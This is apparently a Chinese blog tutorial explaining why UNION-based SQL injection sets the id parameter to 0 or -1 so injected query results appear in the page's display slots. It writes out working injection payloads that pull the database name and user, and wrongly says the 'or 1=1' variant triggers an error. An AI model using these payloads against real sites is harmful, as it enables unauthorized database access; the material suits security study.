当前位置：网站首页>在SQL注入中，为什么union联合查询，id必须等于0

在SQL注入中，为什么union联合查询，id必须等于0

2022-07-02 06:34:00 【hangshao0.0】

其实也不是非得让 id=0

?id=0' union select 1,2,3 --+ ?id=0' union select 1,database(),3 --+
?id=0' union select 1,database(),user() --+

在这里插入图片描述

这里的 id 需要格外注意：

如果只有两个回显位置

那么 id 必须填写一个不存在的数（-1或者0），联合查询才能回显成功

因为在数据表中，id 为 1，2，3，……

如果参数为：
?id=1' union select 1,2,3 --+

那么查询语句就是：
select * from users where id='1' union select 1,2,3 --+' limit 0,1

id=1 的数据被查询出来，返回到页面中，就占据了两个回显位
在这里插入图片描述

这个时候, union 查询的内容，会因为唯二的两个回显位被占据了，导致无法回显

如果 id=2，返回的内容也会占据回显位，导致 union 查询的内容无法回显到页面中
在这里插入图片描述

如果 id 为表中不存在的数，例如 id=0，id=-1 等等

那么查询语句就是：
select * from users where id='0' union select 1,2,3 --+' limit 0,1

因为 id=0 没有查询结果，所以页面中就返回 union 查询的内容
在这里插入图片描述
不一定要让 id=0

其实 id=-1，id=-5 等等都是可以的

在这里插入图片描述
所以，我们可以知道：

只要 union 前面的查询失败，那么 union 后面的查询结果就能回显到页面

id=1’ and 1=2 union select 1,2,3 –+  通过 and 1=2 语句来触发报错
id=1’ or 1=1 union select 1,2,3 –+   通过 or 1=1  语句来触发报错

在这里插入图片描述

版权声明
本文为[hangshao0.0]所创，转载请带上原文链接，感谢
https://blog.csdn.net/weixin_45254208/article/details/124710727